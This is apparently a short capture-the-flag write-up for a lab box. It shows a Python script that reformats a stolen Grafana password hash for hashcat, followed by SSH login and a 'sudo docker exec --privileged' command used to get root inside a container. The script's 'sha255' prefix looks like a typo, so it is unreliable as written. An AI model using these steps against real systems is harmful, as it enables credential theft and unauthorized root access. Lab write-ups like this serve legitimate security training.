Data

There is website running grafana at port 3000

Using an exploit available we can get the grafana.db file. We get the users

Now running decrypt.py:

import hashlib
import base64
password= '7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8'
salt = 'YObSoLj55S'
decoded_hash = bytes.fromhex(password)
hash64 = base64.b64encode(decoded_hash).decode('utf-8')
salt64 = base64.b64encode(salt.encode('utf-8')).decode('utf-8')
print("sha255:10000:"+salt64+":"+hash64+"\n")

Now we get a hash we can crack in hashcat.

Cracking the hash we get cred: Now using ssh and logging in we have sudo privilege on docker exec: The /etc/passwd obtained from LFI is different than the one on this box so it might be a docker container.

When creating a Docker container if -h or -hostname is not specified then hostname is container name.

So getting hostname from grafana machine using LFI: To get into container:

sudo docker exec --privileged --user 0 -it e6ff5b1cbc85 /bin/sh

PreviousBruno NextDelegate

Last updated 1 year ago